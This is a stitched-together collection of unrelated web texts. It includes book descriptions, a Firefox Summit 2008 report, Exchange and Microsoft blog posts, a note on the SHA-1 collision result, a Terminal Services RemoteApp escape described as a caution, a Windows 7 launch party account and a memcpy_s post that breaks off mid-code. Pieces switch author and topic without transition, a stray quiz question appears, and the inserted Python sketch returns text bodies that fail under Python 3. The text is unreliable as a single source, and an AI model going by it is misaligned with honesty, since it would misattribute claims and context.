This book constitutes the refereed proceedings of the 6th International Workshop on Algorithms and Models for the Web-Graph, WAW 2009, held in Barcelona, Spain, in February 2009 - co-located with WSDM 2009, the Second ACM International Conference on Web Search and Data Mining.The 14 revised full papers presented were carefully reviewed and selected from numerous submissions for inclusion in the book. The papers address a wide variety of topics related to the study of the Web-graph such as theoretical and empirical analysis of the Web graph and Web 2.0 graphs, random walks on the Web and Web 2.0 graphs and their applications, and design and performance evaluation of the algorithms for social networks. The workshop papers have been naturally clustered in three topical sections on graph models for complex networks, pagerank and Web graph, and social networks and search.
The implementation of stored procedures in MySQL 5.0 is a huge milestone -- one that is expected to lead to widespread enterprise adoption of the already extremely popular MySQL database. If you are serious about building the web-based database applications of the future, you need to get up to speed quickly on how stored procedures work -- and how to build them the right way. This book, destined to be the bible of stored procedure development, is a resource that no real MySQL programmer can afford to do without. In the decade since MySQL burst on the scene, it has become the dominant open source database, with capabilities and performance rivaling those of commercial RDBMS offerings like Oracle and SQL Server. Along with Linux and PHP, MySQL is at the heart of millions of applications. And now, with support for stored procedures, functions, and triggers in MySQL 5.0, MySQL offers the programming power needed for true enterprise use. MySQL's new procedural language has a straightforward syntax, making it easy to write simple programs. But it's not so easy to write secure, easily maintained, high-performance, and bug-free programs. Few in the MySQL world have substantial experience yet with stored procedures, but Guy Harrison and Steven Feuerstein have decades of combined expertise. In "MySQL Stored Procedure Programming," they put that hard-won experience to good use. Packed with code examples and covering everything from language basics to application building to advanced tuning and best practices, this highly readable book is the one-stop guide to MySQL development. It consists of four major sections:
- MySQL stored programming fundamentals -- tutorial, basic statements, SQL in stored programs, and error handling
- Building MySQL stored programs -- transaction handling, built-in functions, stored functions, and triggers
- MySQL stored programs in applications -- using stored programs with PHP, Java, Perl, Python, and .NET (C# and VB.NET)
- Optimizing MySQL stored programs -- security, basic and advanced SQL tuning, optimizing stored program code, and programming best practices
A companion web site contains many thousands of lines of code that you can put to use immediately. Guy Harrison is Chief Architect of Database Solutions at Quest Software and a frequent speaker and writer on MySQL topics. Steven Feuerstein is the author of "Oracle PL/SQL Programming," the classic reference for Oracle stored programming for more than ten years. Both have decades of experience as database developers, and between them they have authored a dozen books.
The authoritative, hands-on guide to advanced MySQL programming and administration techniques for high performance is here. MySQL Database Design and Tuning is the only guide with coverage of both the basics and advanced topics, including reliability, performance, optimization and tuning for MySQL. This clear, concise and unique source for the most reliable MySQL performance information will show you how to design, optimize, and tune your MySQL databases for reliability and high performance.
My author copies of "Django 1.0 Website Development" have arrived. This is the second edition of my Django book. Django is a framework for building web applications in Python. This book explains how to assemble Django's features and take advantage of its power to design, develop, and deploy a fully-featured web site.
The new edition has been updated to Django 1.0. The full table of contents, which lists the key topics that the reader will learn from the book, is available.
The book is available in paper and PDF formats at Packt Publishing. It is also available from all major book sellers like Amazon.
Writing the book and revising it have been an enjoyable experience for me. The feeling of accomplishment when my copies arrived is satisfying. I sincerely hope that readers find the book interesting and useful. If you have questions or comments, don't hesitate to email me!
More photos of the book are available at my Picasa web albums.
We have often come across the message “Webpage has expired” when attempting to return to a recently accessed page. This message appears because the web server specified an expiration time for the webpage when it was stored in the browser’s cache. How does a web server specify the lifetime of a page to the browser’s cache?
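To make the mechanism concrete, here is a small sketch (mine, not part of the original question) of a WSGI application that answers it: the server attaches Cache-Control and Expires headers to the response, and the browser's cache uses them to decide when its stored copy of the page goes stale.

# Illustrative only: the port and the five-minute lifetime are arbitrary choices.
import time
from wsgiref.simple_server import make_server
from wsgiref.handlers import format_date_time

def app(environ, start_response):
    body = '<html><body>This page may be served from cache for five minutes.</body></html>'
    headers = [
        ('Content-Type', 'text/html'),
        ('Cache-Control', 'max-age=300'),                   # relative lifetime in seconds
        ('Expires', format_date_time(time.time() + 300)),   # absolute HTTP/1.0-style expiry
    ]
    start_response('200 OK', headers)
    return [body]

if __name__ == '__main__':
    make_server('', 8000, app).serve_forever()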
The main piece of news for day 2 in the Firefox Summit 2008 is that everyone is now trapped in the small town of Whistler after a rock slide cut off the highway that connects Whistler with Vancouver. Fortunately, nobody was injured because of this. However, clearing the massive boulders that are blocking the highway will take 5 days according to official sources. Since the summit ends this Thursday, most attendees need to go to the Vancouver Airport on Friday to catch flights to their home countries. The cause of this rock slide is unclear at the moment, but there are people at the summit who are speculating whether a company whose name starts with an 'M' is behind all of this. A bug was filed in Bugzilla to track the issue, and some of the currently-proposed solutions involve riding bears, taking boats, or taking helicopters. In reality, however, we will most likely end up going through a different route that takes around 8 hours in a bus.
Back to the events of the summit itself, day 2 started with presentations on the next release of Firefox. Version 3.1 is planned to be released in the 4th quarter of this year. It brings several interesting capabilities to the rendering engine of Firefox, and improves the overall performance of the browser. One important addition is the implementation of the JavaScript Selectors API. This API provides a better and more efficient method of getting elements from the DOM tree. If you are familiar with jQuery or Prototype, you probably know that these libraries provide a function to get a group of DOM elements by matching against a set of CSS selectors. These libraries implement such functionality using JavaScript. Since traversing DOM elements and matching CSS selectors can be expensive operations in JavaScript, it would be much better if this functionality were implemented in the JavaScript engine using native code. And this is exactly what the selectors API is about: providing a standard set of JavaScript functions to get DOM elements using CSS selectors. Firefox 3.1 will contain this API, and even in the current alpha release, the improvements in performance are significant.
Firefox 3.1 also brings improvements to the canvas element, and provides support for the Ogg Theora video technology. Demos were presented to show off these new features, and the results looked very nice. However, I'm not sure how widely these features will be adopted, given that other browsers may or may not support them.
Next, an interesting and relatively new project called Fennec was presented. Fennec is about bringing Firefox to mobile phones. Even though the project is still in the early stages, there is already a very functional build, which was demonstrated.
The next talk I attended was about Thunderbird localization. Thunderbird 3 is currently in alpha stages. Beta 1 is expected in September 2008, Beta 2 is expected in November 2008, and the final release will happen in January 2009. Thunderbird localization now has a new coordinator, Simon Paquet, and he's very enthusiastic about getting new locales (including Arabic). This is an excellent opportunity to finally have an official release of Arabic Thunderbird, and I think a good time to start importing the current localization to version 3 is around the beta 1 release in September.
Security is very important for a web browser, and one of the selling points for Firefox is the security it offers. I attended two talks on this topic. The first one was a demonstration of the current trends in malware. With malware detection and blocking technologies becoming more advanced, malware authors are finding more sophisticated techniques to trick browsers and/or users to install malware on computers. I haven't used a Windows computer in a very long time, so I wasn't aware of what's going on these days in the world of malware. One interesting attack that was demonstrated was a website that masqueraded as an anti-virus application and tried to convince the user that a virus was found on their computer. Technically, this malicious website consisted of a series of animated images that looked like an anti-virus program starting up, scanning the local hard disk, and then offering the user an executable program claiming that it will clean virus infections, while in reality it will infect the computer with malware. All of this was done in the main window of the browser, without any popups. This is a form of social engineering attack, but it is very difficult to detect and block. How would one detect and block such an attack? This was the open question during the talk, and it resulted in a very interesting discussion on various approaches to handle such issues.
The second talk was about writing secure software. It went through a series of practices that help in designing and building a secure application. It also used examples from actual vulnerabilities that were found in Firefox, which I found particularly interesting.
Another day, another set of interesting talks. I'm excited about the final day of the summit. Hopefully, it will be as interesting as the previous two days. In addition to the talks, this summit has been a wonderful opportunity to meet interesting people from various parts of the Mozilla project, and from all over the world.
The browser's same-origin policy prevents scripts loaded from one domain from accessing resources in another domain. However, this policy imposes several limitations on Web 2.0 apps and restricts interactivity between sites. The W3C has formed a new proposal to accommodate Web 2.0 developers' demands by allowing cross-site requests. Which of the following is the said proposal?
So, you might have seen Gary or Ed mention this, but now that it's underway I have time to talk about it too. 3sharp is presenting a 10-city roadshow called "Optimizing Communication and Collaboration with Microsoft Technologies". The thrust behind the roadshow is simple: you can get a lot of mileage from Microsoft's investment in communications and collaboration technologies by deploying them in parallel with-- not necessarily as a replacement for-- whatever you're currently using. The structure of the events is simple: if you're a developer, you go to John's excellent class on how to extend Notes apps by having them produce, or consume, data from .NET web services; if you're a technical decision maker, you come hear the Burton Group's forecast on market dynamics in the C&C space, then I get to explain the pieces of MS' collaboration strategy, with copious use of demos.
Our first event in Dallas this week went really well. My content was well-received; it was obvious to the attendees that we're not suggesting they rip-and-replace their existing infrastructures (well, maybe if you're using OCS). Instead, we're making a solid case for extending their business systems with Microsoft's collaboration and communications platform. Next stop: Waltham! (Personal to Ed Brill: the Chicago show got moved to 4/21, so please adjust your calendar!)
In this month's Windows IT Pro, I wrote a buyer's guide article on Exchange recovery tools. This just in from an admin who works for the city government of a large city in Virginia:
Thanks for putting this article together. I just wanted to let you know we are just about to implement a NetApp solution for Exchange 2003 and without NetApp's Single Mailbox Recovery product, not mentioned as needed in this article, it is impossible to Backup and Recover Individual Mailboxes, Recover Individual Items or Search and Query for Items to be Recovered. I wanted to let you know because their software is expensive and this product is an extra cost.
Yikes! My apologies for that. When I do a buyers' guide, I write the article itself that accompanies the guide, and I work with the magazine's editors to come up with a list of criteria, plus a list of products that meet those criteria. In this case, the selection criteria included the ability to do brick-level backups, the ability to search and query, and the ability to recover individual items. We don't usually ask vendors to list out all the products, submodules, agents, or other components that have to be installed to meet the criteria. For example, for backup solutions we don't ask whether there's a separate Exchange agent or not. Mail like this makes me think that maybe we should, though, because it's frustrating to buy what you think is a complete solution, only to find out that you have to lay out even more money to get the whole package.
Lots of discussion about Autolink, which is good. So far, though, I haven't seen very much discussion around Adzilla. Their white paper for service providers describes their services for stripping banner ads (and other ad-related content) and letting the ISP insert its own ads. Yikes. I can't imagine that content providers are going to be too happy about that. Imagine going to CNN.com and seeing locally-inserted ads from your cable modem provider.
Back in November, I wrote about a problem with Entourage and Exchange transaction logs-- sending a message that was larger than the Exchange global message size limit would cause Entourage to resubmit the message each time it tried to send mail, and this would lead to a flood of transaction log files. There's now a server-side hotfix for this problem: MS KB 889525 (An e-mail message stays in the Outbox and the Exchange Server 2003 transaction log files grow when an Entourage user tries to send a message that exceeds the size limit in Global Settings).
Dang, I never thought I'd see this happen: the Microsoft Security Response Center (MSRC) has a blog. Pretty cool, and definitely good news for MS' ongoing attempts to broaden the degree of security communications.
You might remember that I ditched the Google Toolbar a couple of months ago. Steve Rubel is reporting on another good reason to do so: the newest version includes a feature called Autolink. Greg Linden explains it very simply: with this feature turned on, Google's modifying web page content to add its own links. For example, addresses are linked to Google Maps pages. Book ISBNs and package tracking numbers are linked too.
The folks at Google Blogoscoped toss this off with "talk about the Google OS taking over our lives", but you know what? Microsoft tried something similar with their IE support for smart tags. Smart tags are exceptionally useful in Office, because you can easily write your own smart tag code to recognize objects unique to your business (like chemical compound names for a pharmaceutical company). I wrote one that recognizes scripture verses (you know, like "John 3:16"). When MS proposed extending this feature to IE, the furor was incredible. Walt Mossberg, Dave Winer, Dan Gillmor, and a host of other influencers immediately started screaming that Microsoft was taking control over web content and generally acting like an 800-lb gorilla. The EFF even opined that the MS smart tag implementation might be illegal. In fact, here's what Chris Kaminski had to say:
Even if smart tags don’t violate copyright or deceptive trade laws, they still violate the integrity of the web. Part of the appeal of the web is that it allows anyone to publish anything, to take their thoughts, feelings and opinions and put them before the world with no censors or marketroids in the way. By adding smart tags to web pages, Microsoft is interposing itself between authors and their audience. Microsoft told Walter Mossberg “the feature will spare users from ‘under-linked’ sites.” Microsoft is in effect deciding how authors should write, and how developers should build, websites.
Worse, Microsoft’s decisions may be at odds with the intent of the site’s author or developer. If an Internet Explorer 6 user visits Travelocity and looks at a page with information on visiting Nice, France, the smart tag that aggravated Thurrott will link the word “Nice” to Microsoft’s Expedia site. With smart tags, Microsoft is able to insert their ads right into competitors’ sites.
Microsoft is crossing the Rubicon of journalistic and artistic integrity. Editors and authors no longer have final authority over what their sites say; Microsoft and its partners do. For a preview of what the web may look like for Internet Explorer 6 users who also have Office XP or Windows XP installed, take a look at InteractiveWeek’s Connie Guglielmo’s preview. With smart tags, Microsoft is effectively extending its role from being a supplier of tools people use to view content to being the executive editor and creative director of every site on the web.
So, check that out: Kaminski accuses Microsoft of "deciding how authors should write", "insert[ing] their ads right into competitors' sites", and becoming "the executive editor and creative director of every site on the web". He left out barratry and mopery and dopery in the spaceways, but that's still a pretty damning list.
Now Google's doing the same thing. Will we see the same reaction?
My guess is "no". Google's widely publicized mantra of "don't be evil" is increasingly often being used to excuse behavior for which Microsoft, Oracle, or IBM would be roundly condemned. This is just the latest such instance. Don't get me wrong: as a user, I think Autolink could potentially be a useful feature (but then I thought the same thing about smart tag support in IE). As a web content provider, I'm not comfortable with the idea that another entity (which may not have my best interests at heart) is modifying my content before someone else sees it. If Microsoft was wrong then, so Google is wrong now.
SearchEngineWatch says "the commercial possibilities are massive"-- I'd have to agree. My somewhat cynical guess, though, is that Google intends to profit from those inserted links, and that raises the question of whether it's OK for Google to make money by modifying other people's web content. My guess would be "not so much"-- look back at the Kaminski quote and see the part about ad insertion again. On the other hand, I see that Dave Winer is labeling this as "a line they must not cross"-- an encouraging early sign.
Update: Adam Gaffin points to this article, pointing out that I have Google ads enabled. True. One prominent difference, of course, is that I get to choose whether ads appear on my page or not; I have some reasonable control over the ads' appearance, and I could filter out competitors if I wanted to. Autolink doesn't provide any of these features, except that it allows you to disable it. If I'm an Amazon affiliate, let's say, how do I stop Autolink from doing something nasty to Amazon links on my page? Sure, it might not do that now, but as any competitive strategist knows, you judge competitors by their capabilities, not by their intentions.
The Weblogs Inc folks covered Adomo's unveiling here (including a picture that's just begging for a caption). I suggested that the Adomo folks contact Robert Scoble before the show; their product is a natural for discussion on his blog, since it's a) MS-centric b) built with .NET and c) very, very cool. I don't know if they did, and now he's offline. However, he gave them (and everyone else) the same advice.
Bruce Schneier is reporting that the SHA-1 hash algorithm has been broken:
The research team of Xiaoyun Wang, Yiqun Lisa Yin, and Hongbo Yu (mostly from Shandong University in China) have been quietly circulating a paper describing their results:
• collisions in the full SHA-1 in 2**69 hash operations, much less than the brute-force attack of 2**80 operations based on the hash length.
• collisions in SHA-0 in 2**39 operations.
• collisions in 58-round SHA-1 in 2**33 operations.
This attack builds on previous attacks on SHA-0 and SHA-1, and is a major, major cryptanalytic result. It pretty much puts a bullet into SHA-1 as a hash function for digital signatures (although it doesn't affect applications such as HMAC where collisions aren't important).
Now this is a surprise, and a pleasant one. Nokia announced that they're licensing Exchange ActiveSync for their Series 60 and Series 80-based phones. This is excellent news for the Exchange team; clearly their effort to get EAS more widely deployed is bearing fruit. (Nokia also licensed Flash... just what I want on my phone, not.) Interestingly, the Windows Mobile team has been busy at 3GSM World too; they announced that Flextronics, a large original device manufacturer (ODM), will be building "Peabody", a new, lower-cost, reference platform for Windows Mobile devices. It should be interesting to see how this plays out.
Update: it turns out that Nokia is also licensing a bunch of Windows Media technologies, including Windows Media DRM and the Media Transfer Protocol. Take that, Apple and your not-yet-shipping Motorola iTunes phone!
Today a startup named Adomo is launching their new product, Adomo Voice Messaging. They briefed me on it a month or so ago, and I've been eagerly waiting for today (the start of the DEMO 2005 conference) for the embargo to lift so I could talk about it. What they're essentially trying to do is build a comprehensive unified messaging (UM) solution that uses Exchange not just as a message store (like Cisco's Unity) but as the communications backbone. I think they're on the right track, taking what I privately label the CommVault approach: they're leveraging Exchange as much as possible, instead of building a product and trying to make it work, not very well, with multiple back ends.
The Adomo system has three parts: an appliance (running their own *NIX variant, I forget which-- maybe FreeBSD?) that handles up to 36 ports from the PBX, a connector that ties the appliance to the Exchange message store, and a really slick speech-based auto-attendant. You can chain appliances to use more than 36 ports, and Adomo's literature shows smaller 12- and 24-port appliances being used in remote offices. Adomo claims that a single 36-port appliance is enough to serve between 1800 and 3600 users, depending on usage; they're purposefully targeting organizations with more than 500 users. The appliance compresses incoming messages using the GSM codec (which means that you can listen to messages on pretty much any Windows, Mac OS X, or Linux machine-- the codec is ubiquitous, unlike Cisco's ACELP implementation) and sends them to the Exchange connector.
The Exchange connector is where the action happens: incoming messages are directed to the user's mailbox, where they appear as regular email messages. This is particularly important because it allows you to deploy their solution without any desktop changes: there are no required plugins or Outlook bits to add, and VM attachments are available on any device that can handle email attachments (including handhelds, OWA, and so on). Messages are delivered using an Exchange form that includes buttons that let you play your VM on your phone, call the sender, and take other appropriate actions; Adomo has promised tighter integration with Outlook for future versions, but the existing integration is pretty darn good.
One of Adomo's big selling points is that you don't have to touch the Exchange server or Active Directory to implement their product. You only need one connector per Exchange organization. The connector doesn't have to be on an Exchange server, and there are no AD schema changes required. You provision user accounts for voicemail by specifying the associated phone numbers, so there's no need for a separate user management tool. Adomo hasn't said which AD attributes they use, but their literature does claim that you can do all the provisioning through AD Users and Computers or through scripts.
Messages appear with Caller ID data, and the connector is smart enough to match that data against the user's Contacts folder so that messages appear with the correct sender information. That makes it easy to prioritize and handle VMs (either manually or with rules) in the same way you would any other email. In addition to the ubiquitous "message waiting" light, the connector can send SMS messages to a mobile phone or alerts (including the Caller ID number in the subject line) to BlackBerry or other non-audio-capable devices.
It's hard to do the auto-attendant justice in this form, but I'll try. When you call in, the attendant answers and plays its recorded greeting. You can speak a name at any time, and their speech recognizer will attempt to find the name in the GAL (with conflict resolution, so it can ask the user which John Smith ("John Smith in Sales, or John Smith in Engineering?") to connect to based on OU, domain, or group membership). This in itself is very cool; the cooler part is that the attendant has access to a wealth of user-specific data, including your schedule and presence data from LCS. Imagine being able to set a rule that says "if my wife calls on her cell phone, IM me to tell me; otherwise, dump all incoming calls to voicemail". From a user perspective, imagine calling a contact and having the attendant tell you "Jane's in a meeting until 3pm Central; do you want me to notify her that you're calling?" (based, of course, on Jane's decision to trust you with that information as a contact in her Contacts folder). There are almost limitless possibilities for future expansion here, particularly given that the Adomo solution can be used with SIP products (conveniently including LCS 2005).
Of course, given Adomo's target market focus, their solution won't work for everyone. First, it requires Exchange 2003. Second, they haven't released pricing data (at least to me) but since their focus is on 500-plus seat organizations, it likely won't be cheap. (One interesting note: Adomo's pitch talks about the benefits of their product for organizations that sell hosted Exchange services-- this could potentially be a nice revenue sweetener for hosting companies). However, in terms of functionality, their nearest competitor is the Wildfire service, which (last I checked) was $70-150/month/user-- so they've definitely got some pricing maneuvering room. I think their product will be successful, but I'm sure it will be interesting to see how Microsoft's announced UM support in Exchange 12 plays against Adomo's solution, which now has a year or two to get traction before E12 ships.
Interesting news: Microsoft is buying Sybari, makers of the outstanding Antigen line of anti-virus products (and some pretty good anti-spam tools, too). Interestingly, there are Antigen versions for Exchange, Live Communications Server, SharePoint, and even Domino; I expect that the breadth of their product line made them a more appealing target than some of their peers. It'll be interesting to see how this acquisition works in conjunction with MS' buy of GeCAD's RAV technology. However, it will be even more interesting to see what effect this announcement has on the second-tier AV vendors-- companies like Command and Panda have got to be sweating now. (Not to mention that many organizations who have stuck with products they don't really like will now use this as an excuse to move!)
I could snark about this filter update taking so long, but at least Microsoft's making the IMF freely available-- some messaging systems have no integrated spam filtering. Anyway, there's now a filter update for the IMF available here.
Ordinarily I wouldn't post this announcement here, but I'm going to break tradition and do so because I'm one of the conference co-chairs. As such, I have to help find speakers, so I want this call for papers to go out far and wide.
Windows IT Pro is now accepting session proposals for the Oct-Nov. 2005 Windows Connections conference. We're heading to San Diego October 30 to November 2, 2005, for the premier Windows technical conference, and we'd like to hear from you!
If you're interested in speaking on Exchange-related topics at the show, send your abstracts to paul@robichaux.net by February 18. We want proposals for regular 75-minute sessions, as well as 1/2 day and full day pre-conference and post-conference sessions.
Note that we have a limited number of speaking slots, and all participants must be able to present a minimum of three 75-minute sessions. There are three basic requirements:
Please adhere to the February 18 deadline as we need to make speaker and session selections right away. (We plan to have a conference brochure ready to distribute at TechEd in June.)
I had a very interesting phone call yesterday with an IBMer named Jim Colson. Jim actually is the chief architect responsible for the Workplace Client Technology platform, and he'd contacted me after seeing my earlier post complaining that WCT wasn't generally available to tell me that it is available. Clearly there was a disconnect if it appeared that two different parts of IBM were telling me two different things, so I was eager to get the lowdown.
Jim explained that WCT is a client middleware platform, which includes a wide range of technologies (including a managed client container, access technologies such as messaging, distributed business logic, data synchronization, and interaction technologies such as Embedded ViaVoice, and other presentation services including browser-based and widget-based interfaces from Eclipse). These technologies can be used to build applications on various types of embedded, mobile, desktop, laptop, and server devices. The underlying technology has been in development for about 7 years and has been deployed in a wide range of solutions such as cars from Honda, Nokia mobile phones, laptops and tablets with Nissay, and a wide range of line-of-business apps.
WCT is currently available to customers in a variety of forms. It's already built into a number of other products, and the WCT Micro Edition SDK offers a freely downloadable set of WCT components that can be used to evaluate WCT as an app dev platform. (To be perfectly unambiguous: the SDK is for production use, but you can download it to play with.)
WCT supports building deployable assemblies of components-- think of them as packaged runtimes-- to support particular applications. The Enterprise Offering (more properly, the Workplace Client Technology, Micro Edition Enterprise Offering, or WCTME-EO) bundles the most commonly required components and middleware services for desktop and laptop-class devices into a single deployable bundle. So, mea culpa: WCTME-EO and the WCT SDK are both generally available and widely used, my earlier claims notwithstanding. Thanks Jim!
Still with me? OK, back to my previous post. Among other WCT customers, Lotus is using the WCT platform to build their own client, the Workplace Client Technology, Rich Edition. This is the actual client platform that I've been trying to get, and it is not generally available-- at least according to my IBM sales rep and the Lotus WCT Project Office. That's supposed to change with the release of Lotus Workplace Messaging 2.5 and Lotus Workplace Documents 2.5.
To put this in more familiar terms, my earlier post was roughly equivalent to complaining that Microsoft wouldn't let me have the .NET Framework (which is freely available and widely deployed, and for which beta/preview versions exist) when what I really wanted was Office. You can argue over whether Lotus is being forthright about exactly who can get their WCT-based clients, and under what circumstances, but the bottom line is that WCT itself is available, and that's what Jim was trying to help me understand. Now I know what specific term to use next time I complain to Ed Brill.
Here's a very cool trick: Glen Scales wrote a script that finds all of your mailbox and public folder stores, then queries their servers' event logs to find event ID 1221s indicating how much white space is available. This is a slick solution to the vexing problem of monitoring how much white space is lurking in your databases.
In today's session at SMBNation, I showed how to use TS RemoteApp with TS Gateway on SBS 2008 to deliver remote applications through Remote Web Workplace. It is one of the coolest features in the Windows Server 2008 operating system. But we have to remember what it's doing.
Part of the conversation was about the difference between local desktop display of a TS RemoteApp versus having a full desktop session on the Terminal Server. One belief that came up was that, when running a RemoteApp, you can't run other applications.
Well, that is not actually true. If you assume it is, then a TS RemoteApp can become an attack vector against you. What do I mean? Well, below is a screen shot of what happens if you hit CTRL-ALT-ENTER with the cursor focused on the RemoteApp window (in this case MS Paint running remotely):
At this point, you can run Task Manager... then hit File->Run and run something else. In my case, I showed a few people afterwards how to start cmd and start exploring the network. Now, you will only have the privileges of the user account you are logged in as, but it is still something you have to be careful about. If you think a RemoteApp bundle prevents access to other applications or the network... you are wrong.
So is this bad? No. Is it really an attack vector? No. You just need to understand that when allowing ANY type of Terminal Services based access, you have to restrict the policies and access accordingly, whether the session is local or remote. Running a TS RemoteApp bundle of Office will display on the local desktop, but it is STILL running on the Terminal Server. So it will browse the network the Terminal Server is connected to as if that were the local network, and it will also browse your own drives mapped via tsclient. You have to remember that.
Hope that's useful. A TS RemoteApp bundle does NOT mean you won't have access to the TS desktop when it displays remotely on your personal desktop. And that's not a bad thing. TS RemoteApp is a convenient way to extend the workspace to your local machine, anywhere in the world. No pun intended. That's its power... and its benefit. A great remote productivity enhancement in Windows Server 2008. Use it. (Safely, of course.)
It's only a few days away. The official launch of Windows 7 is here!
And of course, that means it's time to party!!! You may have heard about the Windows 7 House Parties being thrown all around the world. Basically, thousands of small groups of people are getting together to see what Windows 7 can do.
Personally, I thought we needed to do more. So fellow MVP and friend Charlie Russel and I decided we would throw our own party, but focused on IT pros rather than the consumer angle. We plan to have a lot of fun showing the cool features of Windows 7 for IT pros, like BitLocker, AppLocker and DirectAccess. We plan to bring a bunch of laptops and show new shell extensions, PowerShell, the new multi-touch features, and basically sit around and enjoy hours of Q&A for those that haven't tried it yet. We are even planning on installing Windows 7 on a guest's MacBook to show how well it does using Boot Camp on Apple hardware, and even on small netbooks.
I also wanted to send a message out to the Vancouver IT community to clear up some misconceptions. This is a party hosted by Charlie and myself. This is NOT a Microsoft event. Microsoft was gracious enough to let us use their facility and even sprang for some of the cost of the pizza. However, they did not plan this event, and neither did the local VanTUG and VanSBS groups.
Our party is an INVITATION ONLY event. Because we are limited in our own budget and constrained in where we could have the party... we only have enough room for 75 people. So we could only allow a certain number of our friends to come. Charlie and I decided the best way to handle this would be to simply invite who we wanted, and then open it to our friends at the local user groups on a first come, first served basis. This is why there is a cap on the registration on the event, and why it booked up so quickly.
I am hearing through the grapevine that there is a LOT of dissent in the Vancouver IT community from people who feel that Microsoft, VanTUG and VanSBS did a poor job organizing this. LET ME BE CLEAR: this is a personal party that Charlie and I organized. If you were lucky enough to get an invitation and registered, great. But if you didn't, don't take it out on Microsoft, the local user groups or their leaders. It's not their fault!!!
We are using our own money and time to throw this party. Please be considerate and respect that we couldn't invite all of you. I am happy to see there is so much excitement about Windows 7 and that you wanted to party with us. And I am sorry if you feel it isn't fair that you didn't get invited. Please feel free to share your own Windows 7 experience, and host your own party. We may be the only IT pro party during the Windows 7 launch, but nothing says you can't have your own!
So party on. Welcome to a new world. Welcome to Windows 7!
Hey guys. I noticed Twitter is abuzz with a few podcast interviews I did on RunAs Radio lately. I thought I'd post the links for those of you who don't follow such tweets.
There were two interviews I did last month:
The first interview was a discussion of free tools available for network monitoring and diagnostics. The second was a more in-depth discussion of using DirectAccess with Windows 7 and Windows Server 2008 R2. I do hope you find both interviews fun and useful.
Enjoy!
So this week my buddy Charlie and I threw a Windows 7 party for the IT pro community in Vancouver, BC at the Microsoft office.
The office could only handle 80 people, and we simply had to turn people away. Sorry to those who weren't allowed to come. Many people came early, and hung out in the hallway even before they were allowed in.
With almost 100 people in that hallway just off the elevator, the hall was WARM. I felt bad for some of the people, as you could tell they were overheating. But we weren't ready to let them in, as we were still setting up the rooms with different Windows 7 systems.
When we did open the doors it was a mad rush for everyone to get in where it was cooler and they could grab a cold one and cool down. Thankfully everyone was patient and polite. Thanks to everyone for that!
Once they got in, there were several different rooms they could hang out in. In one room, Charlie had brought an HP Media TouchSmart so people could experience the new multi-touch functionality of Windows 7. Kerry Brown, a fellow MVP with experience in the Windows shell, stayed in the room teaching people all the new shell features like Libraries and Jump Lists, and I am told he schooled some admins on the nitty-gritty of PowerShell. Good job Kerry! Thanks for helping out!!!
Every time I looked in that room, people were gathered around the device playing with the Touch Pack games and with Virtual Earth. It was interesting to hear my buddy Alan comment that the multi-touch experience on his iPhone, especially with Google Earth, was far superior to what he was seeing there. Maybe that is something Microsoft can take away from this. Of course, there's a big difference between a 24-inch monitor and a small iPhone screen. But the point is well taken.
We had the biggest crowds when we did demos in the main presentation room. When I was presenting on DirectAccess security, I had my good friend Roger Benes (a Microsoft FTE) demonstrate how Microsoft uses DirectAccess itself. Using the Microsoft guest wireless, he connected seamlessly to Microsoft's corpnet, which allowed us to demonstrate the policy control and ease of use of the technology. I am told a lot of people enjoyed that session, with several taking that experience back to their own offices to discuss deployment. That's always good to hear.
Charlie impressed the crowd by showing how to migrate from Windows XP and Vista to Windows 7. He demonstrated Windows Easy Transfer and Anytime Upgrade and took the time to explain the gotchas in the experience. He even had me demonstrate XP Mode on my laptop so people could see how they could maintain application compatibility with a legacy Windows XP environment virtualized on Windows 7.
Of course, I had a lot of fun hanging out in the far back room. I got to demonstrate some of the security features built into Windows 7, like BitLocker, AppLocker and BitLocker To Go. I was even asked about Parental Controls, which I couldn't show on my laptop since it's domain-joined, but was able to show on a demo box Roger had brought for people to play with.
One of the more interesting things I helped facilitate was asking my buddy Alan to bring his MacBook in. He is a great photographer who works with Linux and OS X a fair bit, on top of using Windows. Actually, all the photos you see in this post were taken by him. Thanks for sharing them, Alan!
Anyways, I convinced him to let us use his MacBook to install Windows 7. He reluctantly agreed, as you can see from the picture below of him looking at the Snow Leopard and Windows 7 media together. :-)
We had a fair number of people crowd around his MacBook as he went through the process of installing Boot Camp and deploying Windows 7. Interestingly enough, it flawlessly converted that Apple hardware into a powerful Windows 7 system in about 20 minutes.
Charlie and I were REALLY busy. We each presented different sessions in different rooms throughout the night. I very rarely even saw him, except for a few times when he called me in to help out with a demo. Sorry we couldn't party more together, Charlie. And my apologies to those who were looking forward to our traditional "Frick and Frack" show where we banter back and forth.
Many of you may not know that outside of computers, I am an avid indie filmmaker. Actually, that is giving me too much credit; I am an amateur cinematographer at best, who had high hopes of getting a chance to film everyone's impressions throughout the party. Unfortunately, I was so busy presenting that I had almost NO TIME to get any film recorded. *sigh* Alan did get a snap of a rare moment when I actually caught someone on film.
Of course I can't complain too much. I had a great time getting to show all the neat features in Windows 7, and answering the tonnes of questions that people had.
Of course, when the night finally wound down, it was nice to close out the party and watch the Vancouver skyline change. When we were done, we had the opportunity to hang with our IT friends in Vancouver and bring in the birth of Windows 7.
I have several people I would like to thank for making the evening possible. Charlie and I couldn't have done it without the support of people like Graham from VanTUG, Jas from VanSBS and Roger from Microsoft. Speaking of Microsoft, I have to give a shout out to Sim, Sasha and Ljupco in the MVP team who helped us get through all the red tape to throw the party at Microsoft's office. And many thanks to Brent, Alan and Kerry for helping us out throughout the event. My thanks to all of you.
I hope everyone had a good time. And if anything, Charlie and I hope you learned something that will help you deploy and use Windows 7 in your organizations. Happy birthday Windows 7. Welcome to a new world without walls!
P.S. All the pictures you see here were taken by Alan and used with his permission. You can check out some of his other amazing work at bailwardphotography.com.
So recently Microsoft banned memcpy() from their SDL process, which got several of us talking about perf hits and the like when using the replacement memcpy_s(), especially since it has SAL mapped to it. For those that don't know, SAL is the "Standard Annotation Language" that allows programmers to explicitly state the contracts between params that are implicit in C/C++ code. I have to admit SAL annotations are sometimes hard to read, but they work extremely well at helping the compiler know when things won't play nice. SAL is great for static code analysis of the args passed to functions, which is why it works so well for things like memcpy_s()... since it enforces length checks between the buffers.
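To make that concrete, here's a minimal sketch of what the swap looks like in practice. The wrapper function and its annotations are my own illustration (not from the SDL guidance), and the exact SAL macro names vary a bit between SDK versions:

#include <sal.h>
#include <string.h>   /* memcpy_s lives here in the MSVC CRT */

/* Hypothetical wrapper: the SAL annotations spell out the contract -- dst must be
   writable for dst_size bytes and src readable for len bytes -- so static analysis
   can flag call sites that can't satisfy it. */
errno_t copy_blob(
    _Out_writes_bytes_(dst_size) void *dst,
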